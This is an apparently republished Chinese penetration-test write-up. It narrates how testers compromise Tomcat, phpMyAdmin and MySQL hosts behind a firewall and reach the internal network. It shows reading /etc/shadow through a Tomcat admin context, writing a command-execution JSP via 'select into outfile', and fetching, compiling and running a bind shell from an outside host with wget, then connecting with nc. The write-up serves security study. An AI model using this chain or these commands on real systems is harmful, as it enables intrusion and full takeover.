一次渗透测试的过程
来源:互联网 发布:电脑ps软件中文版 编辑:程序博客网 时间:2024/05/17 02:15
我们检测的三台主机中两台为Linux系统,一台为AIX系统。还有一台是边界路由器。
目标网络的主机通过地址转换来提供对外访问,内部使用172.16.*.*地址段(这些信息
是测试之后才得到的,开始并不知道)。在边界路由器后面还有一台Cisco PIX 525
(515?)对三台主机进行保护,只允许外部用户连接不同主机的部分端口,例如80,
25,110等等。
根据我们的检测,Cisco PIX防火墙的过滤规则设置还是比较严密的,基本上没有
多余端口允许外部用户访问。
在对xx.xx.xx.2和xx.xx.xx.3进行了端口扫描之后,发现只有通过
xx.xx.xx.3的WEB服务进行进行间接攻击。首先检查TCP/80端口的服务,我们
发现新闻搜索的功能是在另外一个端口8070提供的。直接输入:
http://yyy.yyy.yyy:8070/
之后,得到了一个系统管理登录页面,简单地测试了一下,输入test/test作为用户
名/口令,似乎认证成功,但最后并不能进入下一个页面。我们发现这个端口正在运行
Tomcat 3.1,而这个版本存在一个安全漏洞,缺省/admin目录是可以访问的。
在输入:
http://yyy.yyy.yyy:8070/admin
之后,我们果然看到了”Tomcat Administration Tools”的页面, 通过点击
”Context Admin”这个链接,我们可以对Tomcat的Context进行管理,例如查
看、增加、删除Context。这个Context有点类似虚拟目录,于是我们可以增加一个
context, 例如”/tt”,将它的文档根目录设置为”/”,这样当我们访问
http://yyy.yyy.yyy:8070/tt
时看到的就是系统根目录的列表了!进一步可以查看任意目录里面的任意文件。
由于Tomcat是以root身份运行的,所以可以查看任意系统文件,例如/etc/passwd
和/etc/shadow。根据口令文件进行密码破解后发现系统中的两个用户test和root
都使用了非常简单的口令:123456。尽管外部用户无法直接访问telnet服务,这些
口令还是应当被重设为更为强壮的字符串
利用这个漏洞我们基本上可以查看整个系统,但是由于无法写入数据,威胁似乎还不
是很大。
于是我们将注意力转移到论坛和聊天室。这两个服务一个监听在8080,一个监听在8888
端口。直接输入http://yyy.yyy.yyy:8080/, 我们看到了Tomcat
4.1.10的欢迎页面,点击左边的管理链接:
http://yyy.yyy.yyy:8080/admin ,我们得到了一个登录页面,虽然
我们不知道口令,但是通过前面8070端口的漏洞,我们找到了Tomcat保存这些口令的
文件,得到了管理用户名为admin,口令为空。于是我们就可以对整个Tomcat服务器进
行管理了。
但这仍然不足以让我们在系统上运行命令。于是我们继续检查聊天室所在的8888端口。
这个端口运行的是apache 1.3.26 +php 4.1.2。开始没有发现什么问题,突然想
到前面发现的两个漏洞都与/admin有关,这个端口上会不会也有这个目录呢?在输入
这个目录之后我们惊奇地发现,我们进入了一个phpMyadmin的管理界面。我们可以对
整个数据库进行任意操作。由于数据库是MySQL,它支持从本地操作系统读入或者写入
数据。因此我们在test库中建立了一个简单的表,然后添加一条记录,记录的内容就
是一个php文件的内容,我们想写入一个php文件,然后利用php调用外部命令的方法
来执行命令。我们利用
select tt into outfile /path/test.php from kk
(感谢小许提供技术支持)
这样的命令来将数据库中的内容写到一个php文件里,但由于mysql是以mysql用户身
份运行的,无法写到apache的目录中。所以这次尝试失败了。
我们又想到了一个方法,利用8070端口的漏洞我们可以访问任意系统文件,而8070端
口是由tomcat提供服务的,如果我们可以设法在系统中创建一个.jsp文件,就可以远
程访问这个jsp文件,它将被tomcat处理并运行。如果这个.jsp文件中的内容是一段
执行系统命令代码,就可以运行系统命令了。
于是我们又重新编写了一段可以执行系统命令的jsp代码,将其输入测试表中,再次利
用into outfile方法将其内容写到/tmp/test.jsp文件中,然后访问下列链接:
http://yyy.yyy.yyy:8070/tt/tmp/test.jsp
(感谢watercloud提供技术支持)
我们发现我们指定的命令被执行了!而且是以root身份执行的。这意味着我们已经完全
控制了整个系统。欢迎光临学网,收藏本篇文章 [1] [2]
$False$
当然,通过cgi执行命令还是不如有一个shell来得方便。当然最简单的方法就是开一个
xterm连回到我们的Xwindows即可。但是我们是用的NAT,连不进来。听说工程部有
个IP是可以外部访问的,就搬了笔记本过去准备用,结果在一切都准备好之后,发现对方
居然关机了!@#^*#%#%#$%
第二天,我决定还是用老办法,开个shell算了。首先要找到一个可以外部访问的端口。
但是防火墙并不允许外部访问所有的端口,经过一番测试,发现所有允许访问的端口都
被占用着。仔细看了看进程,发现chatserver占了4个端口,每一个端口对应一个
聊天室,而且目前也没有人在使用这些聊天室。所以我就先kill掉其中一个进程,这样就
可以将在其对应的端口上绑定一个shell了。
通过jsp执行命令来下载/编译/运行我们的bindshell:
wget http://ourhost/bindshell.c
gcc -o bindshell bindshell.c
nohup ./bindshell
现在就可以连接我们的shell了:
nc yyy.yyy.yyy 9100
现在我们已经在防火墙的后面了,因此可以直接访问内网了。通过扫描发现存在如下内
部主机:
172.16.1.1 Cisco PIX
172.16.1.2 mail
172.16.1.3 web
172.16.1.4 oracle db
进一步测试还可以入侵其中的oracle服务器。至此,此次渗透测试基本结束。
资料来源:学网(www.xue5.com),原文地址:http://www.xue5.com/itedu/200707/150823.html
- 一次渗透测试的过程
- 对Linux服务器的一次渗透测试过程
- 一次渗透的具体过程
- 一次渗透的具体过程
- 记一次简单的渗透测试经过
- 一次完整的安全渗透测试
- 一次完整的安全渗透测试
- 记一次曲折的渗透测试经历
- 一次图文并茂的渗透完整测试
- 一次mysql渗透过程
- 记一次渗透测试
- 记一次sql查询利用不算艰难曲折渗透的过程
- 记一次完整的办公网渗透到idc过程
- 【萌新】记录一次渗透小站的过程
- 一次通过漏洞挖掘成功渗透某网站的过程
- 利用MS12-020进行的一次简单渗透测试
- 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
- 一次WEB服务器渗透测试笔记
- 深入浅出ShellExecute
- VC中控制只启一个程序实例的方法
- 一年总结与展望
- VCL窗口函数注册机制研究手记,兼与MFC比较
- 课件制作工具——wizBuilder CS
- 一次渗透测试的过程
- 由于文件不可访问或者内存或磁盘空间不足 所以无法打开数据库"Picture"
- tomcat 6 SSI 配置问题的解决
- 英语面试技巧!
- awk&grep 命令完全解析--之linux高级命令
- 浅析ASP.NET生成随机密码
- 正则表达式学习笔记
- c# 的namespace以及assembly
- 键盘